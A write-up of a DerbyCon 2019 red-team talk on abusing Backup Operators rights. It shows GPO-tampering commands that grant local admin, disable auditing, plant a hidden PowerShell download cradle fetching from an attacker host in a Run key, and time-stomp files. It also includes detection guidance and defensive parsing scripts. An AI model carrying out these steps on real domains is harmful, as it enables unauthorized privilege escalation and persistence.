Dave Mayer specializes in red teaming and pen testing. This talk came out of only having a limited number of ports (135, 139, and 445) available on a domain controller during a pen test. Null sessions were identified, domain users were dumped, and the only account recovered was the Backup Operators account in the Backup Operators security group. Typically these accounts have been around for years, haven’t had their password changed since creation, are used to back up a large number of systems across the domain, and may have been migrated from one backup solution to another. Let’s look at how to abuse these permissions to obtain unauthorized access.

Backup Operators is a built-in container that provides functionality to override security restrictions for the sole purpose of backing up or restoring files. This group does not provide:

  • remote desktop access
  • local administrator permissions
  • launching processes over the network

This group does provide:

  • local console login
  • log on as a batch job
  • shut down the system
  • back up files/directories
  • restore files/directories

To use the backup permissions, a high-integrity session must be used. These processes can also be run with network-only credentials via runas /netonly. To copy a single file or a directory with backup semantics, the following commands can be used:

#single file with backup permissions
robocopy.exe $source_folder $destination_folder $file /b

#directory copy using backup permissions, including empty folders (/e)
robocopy.exe $source_folder $destination_folder /e /b

How to Back Up Files: Demo Commands

whoami
runas /netonly /user:$DOMAIN\backup cmd.exe
robocopy \\$DOMAIN_CONTROLLER\sysvol\$DOMAIN\ c:\GroupPolicy\ /b /s

#an error message will appear if the correct permissions aren't configured

#restore a file back to the domain controller after altering it
robocopy c:\GroupPolicy\modified\Policies\$GUID \\$DOMAIN_CONTROLLER\sysvol\$DOMAIN\$GUID GPT.INI /b

Privilege Escalation

The Default Domain Controllers Policy has the same GUID in every domain, and the speaker hasn’t seen any clients change it. Listed below are that GUID, the path of the group policy configuration files stored on SYSVOL (readable by every system in the domain), the file holding the privilege assignments applied to systems under the GPO, and the SID of Backup Operators.

#background information
{6AC1786C-016F-11D2-945F-00C04FB984F9}
\\$DOMAIN_CONTROLLER\sysvol\$DOMAIN\Policies\{6AC1786C-016F-11D2-945F-00C04FB984F9}\
$GPO_PATH\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
*S-1-5-32-551

#get the account SID with PowerView; the domain SID is everything before the trailing RID (1109)
Get-DomainUser backup | Select name,objectsid
S-1-5-21-3367745724-233473374-3840074820-1109

#modify the [Group Membership] value in GptTmpl.inf and set it to the SID of the group the account should become a member of, Administrators (S-1-5-32-544) in this case
[Group Membership]
*S-1-5-21-3367745724-233473374-3840074820-1109__Memberof = *S-1-5-32-544

#restore the changed policy
robocopy "C:\GroupPolicy\Modified\MACHINE\Microsoft\Windows NT\SecEdit" "\\$DOMAIN_CONTROLLER\SYSVOL\$DOMAIN\Policies\$GUID\MACHINE\Microsoft\Windows NT\SecEdit" GptTmpl.inf /b

#validate the changes, or wait for the GPO to propagate if you don't already have access to the system
gpupdate /force
net localgroup administrators

Targeting a System

Find a Computer Object that we’d like to target, analyze the GPOs that are applied to the target system, and add the SID of the account being used to gain access.

#using PowerView, noting the gpcfilesyspath attribute of the applied GPOs
Get-DomainGPO -ComputerIdentity $COMPUTER_NAME
Get-DomainUser -Identity backup

#modify the default GptTmpl.inf by adding another SID to Members: the group SID first, then the full account SID
*S-1-5-32-544__Members = *S-1-5-21-3367745724-233473374-3840074820-1115, *S-1-5-21-3367745724-233473374-3840074820-1109

#wait for the GPO to apply, then validate
net localgroup administrators

This is a noisy attack if the right things are being monitored in the environment. The original GPO should be backed up so that it can be restored once the attack is done. Additionally, some artifacts may be left on systems after the GPO is reverted, such as the admin accounts that were added to local groups on a system.
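One defensive check suggested by the GptTmpl.inf mechanism used in both sections above, as an added example that is not from the talk: parse the [Group Membership] section (both the Group__Members and Account__Memberof forms shown on the page) and report any SID the policy would push into local Administrators that is not on an allowlist. The INF fragment and the allowlist (Domain Admins, RID 512, built on the page's example domain SID) are constructed assumptions; a real GptTmpl.inf pulled from SYSVOL must first be decoded, since it is normally stored as UTF-16.

```python
ADMINS = "S-1-5-32-544"   # built-in Administrators, the group targeted on the page
DOMAIN_SID = "S-1-5-21-3367745724-233473374-3840074820"   # the page's example domain SID
# Assumed allowlist: only Domain Admins (RID 512) may be made local Administrators by policy.
ALLOWED_ADMINS = {DOMAIN_SID + "-512"}

# Constructed GptTmpl.inf fragment carrying both Restricted Groups forms seen on the page:
# Group__Members (the group's member list) and Account__Memberof (add account to group).
SAMPLE_INF = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-3367745724-233473374-3840074820-512, *S-1-5-21-3367745724-233473374-3840074820-1109
*S-1-5-21-3367745724-233473374-3840074820-1115__Memberof = *S-1-5-32-544
"""

def group_membership(inf_text):
    """Map group SID -> set of member SIDs declared in [Group Membership]."""
    members, section = {}, None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "Group Membership" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sids = [s.strip().lstrip("*") for s in value.split(",") if s.strip()]
        principal, _, relation = key.strip().lstrip("*").partition("__")
        if relation == "Members":
            members.setdefault(principal, set()).update(sids)
        elif relation == "Memberof":   # the form used in the privilege escalation above
            for group in sids:
                members.setdefault(group, set()).add(principal)
    return members

def unexpected_local_admins(inf_text, allowed=ALLOWED_ADMINS):
    """SIDs the policy would push into local Administrators that are not allowlisted."""
    return sorted(group_membership(inf_text).get(ADMINS, set()) - allowed)

if __name__ == "__main__":
    print(unexpected_local_admins(SAMPLE_INF))
```

Run it against every GptTmpl.inf under SYSVOL\Policies on a schedule and diff the result against the previous run; a new SID in the output is the change the native logs never record.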

Abusing Active Directory Auditing

The configuration information for what is logged is stored in a Group Policy Object:

\\$DOMAIN_CONTROLLER\sysvol\$DOMAIN\Policies\{6AC1786C-016F-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\Audit\Audit.csv

The information within the file should be reviewed to determine what is being logged. Detailed File Share auditing logs every file share access, but this generates a large volume of events on a Domain Controller. Directory Service Changes auditing logs all creation, deletion, and modification of AD objects; this also generates a large volume of events on a Domain Controller. However, since the audit settings are controlled by a CSV, and Backup Operators can restore files, let’s disable AD auditing by deleting the contents of the Audit.csv file. These settings can be restored by restoring the backed-up Audit.csv file to its original location.

Modifying the Registry

A Group Policy can also apply registry changes, which are stored in Registry.pol files. These files can contain both user and computer settings. Notepad won’t work for editing them, but Microsoft’s LGPO.exe (Local Group Policy Object utility) can be used for this purpose.

#dump all the settings in the policy files to text
LGPO.exe /parse /m Registry.pol > machine.txt
LGPO.exe /parse /u Registry.pol > user.txt

#add a malicious HKLM entry that will run for every user impacted by this GPO / Organizational Unit that also logs in
Computer
Software\Microsoft\Windows\CurrentVersion\Run
Slartibartfast
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://$attacker_ip/sauce');"

#recombine the files and write the modified Registry.pol
type machine.txt >> lgpo.txt
type user.txt >> lgpo.txt
LGPO.exe /r lgpo.txt /w modified\Registry.pol

#validate the settings; they stay cached on the endpoint even after the changes are reverted (and survive a reboot)
hostname
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

COM Hijack

While this is not an in-depth discussion of COM hijacking, Group Policy can again be used to target specific machines and users as previously discussed. A DLL is dropped to disk on a target workstation at a specific path, and the COM object’s registry keys in the GPO are then pointed at that DLL. The InprocServer32 example is shown with the (Default) value of type REG_EXPAND_SZ and data “C:\malicious.dll”, and a second value, ThreadingModel, of type REG_SZ with data “Both”. Once Group Policy refreshes, any system with this DLL on disk that is impacted by the modified GPO will execute the DLL.

3rd Party Plugins

Centrify is a third-party plugin that creates a virtual registry on Mac and Linux machines so that Active Directory policies can be extended to them. Its settings are stored in Registry.pol files and include whether SSH is enabled on the endpoint and which users are local administrators on it.

More Manipulation

Once the group policies are modified, the restored files can be time-stomped to make it appear as if the GPOs have not changed since their original modification date. Restore the originals after reaching the objective of the engagement.

Other Fails

NTDS.dit can’t be copied from a running system.

Artifacts

Local admin accounts may remain cached until they are cleaned up. Registry entries may remain, so the added entries must be removed manually. Group Policy will accept the changes when restored, so be sure to clean up and restore all original group policies to their original state.

Detection

Default logging only shows a network logon for the backup account. Baseline when this account should be in use and ensure that it is only used during those times. Adding an account to a group via Active Directory Users and Computers (ADUC) generates Event ID 4728, but modifying the GPO’s GptTmpl.inf generates no log entry. With detailed file share auditing enabled, Event ID 5145 records data being written to the Audit.csv file, which shouldn’t happen unless Group Policies are actually being updated. Definitely alert on Event ID 5145 and Event ID 4719, and deploy File Integrity Monitoring (FIM) outside of native Microsoft functionality on the Domain Controllers to ensure the integrity of the Group Policies.
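An added example (not from the talk) of the triage logic the detection advice above describes, run over a few constructed Security log events: flag Event ID 5145 writes to GptTmpl.inf, Audit.csv or Registry.pol under SYSVOL\Policies, flag every Event ID 4719 audit policy change, and flag backup-account network logons (4624, logon type 3) outside an assumed maintenance window. Field names follow the EventData names Windows logs for those events; the account name, the window and the timestamps are assumptions.

```python
import re
from datetime import datetime

# Policy files a Backup Operator could rewrite through SYSVOL. Legitimate GPO edits
# touch them too, so the alert is "who wrote, and when", not a block.
WATCHED = re.compile(r"\\Policies\\\{[0-9A-F-]+\}\\(MACHINE|USER)\\(?:.*\\)?"
                     r"(GptTmpl\.inf|Audit\.csv|Registry\.pol)$", re.IGNORECASE)
WRITE_BITS = 0x2 | 0x4 | 0x10000   # 5145 AccessMask: WriteData/AddFile, AppendData, DELETE
BACKUP_ACCOUNTS = {"backup"}       # assumed name of the backup service account
BACKUP_WINDOW = (1, 5)             # assumed baseline: backup jobs run 01:00-05:00 only

GPO = "corp.local\\Policies\\{6AC1786C-016F-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\"
# Constructed sample events (EventData field names as logged by Windows).
SAMPLE_EVENTS = [
    {"EventID": 5145, "TimeCreated": "2019-09-06T13:02:11", "SubjectUserName": "backup",
     "ShareName": "\\\\*\\SYSVOL", "AccessMask": "0x1", "RelativeTargetName": GPO + "SecEdit\\GptTmpl.inf"},
    {"EventID": 5145, "TimeCreated": "2019-09-06T23:41:07", "SubjectUserName": "backup",
     "ShareName": "\\\\*\\SYSVOL", "AccessMask": "0x2", "RelativeTargetName": GPO + "SecEdit\\GptTmpl.inf"},
    {"EventID": 5145, "TimeCreated": "2019-09-06T23:42:30", "SubjectUserName": "backup",
     "ShareName": "\\\\*\\SYSVOL", "AccessMask": "0x2", "RelativeTargetName": GPO + "Audit\\Audit.csv"},
    {"EventID": 4719, "TimeCreated": "2019-09-06T23:45:00", "SubjectUserName": "SYSTEM"},
    {"EventID": 4624, "TimeCreated": "2019-09-06T23:40:55", "TargetUserName": "backup", "LogonType": "3"},
    {"EventID": 4624, "TimeCreated": "2019-09-06T02:00:05", "TargetUserName": "backup", "LogonType": "3"},
]

def triage(events):
    """Return (rule, principal, detail) tuples for events worth an analyst's attention."""
    alerts = []
    for e in events:
        hour = datetime.fromisoformat(e["TimeCreated"]).hour
        if e["EventID"] == 5145:
            target = e["RelativeTargetName"]
            if WATCHED.search(target) and int(e["AccessMask"], 16) & WRITE_BITS:
                alerts.append(("gpo_file_write", e["SubjectUserName"], target.rsplit("\\", 1)[1]))
        elif e["EventID"] == 4719:
            # Audit policy changes applied by GPO show SYSTEM as the subject, so the event
            # itself is the signal; correlate it with a preceding Audit.csv write.
            alerts.append(("audit_policy_change", e["SubjectUserName"], e["TimeCreated"]))
        elif e["EventID"] == 4624 and e["LogonType"] == "3" and e["TargetUserName"] in BACKUP_ACCOUNTS:
            if not BACKUP_WINDOW[0] <= hour < BACKUP_WINDOW[1]:
                alerts.append(("backup_logon_outside_window", e["TargetUserName"], e["TimeCreated"]))
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```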

Going Further

There are numerous files related to Active Directory on the Domain Controllers. Keep exploring to identify unintended methods of modifying files that result in the bypassing of audit logs or obtaining additional unauthorized access.

Conclusions

Monitor when backup accounts are logging on, when changes to files on Domain Controllers happen, and alert on unexpected changes.


Reference Index
Estimated date of talk: DerbyCon 2019
Slides: Irongeek
Title: The Backup Operators Guide to the Galaxy
Speaker: Dave Mayer, Pen Tester / Red Teamer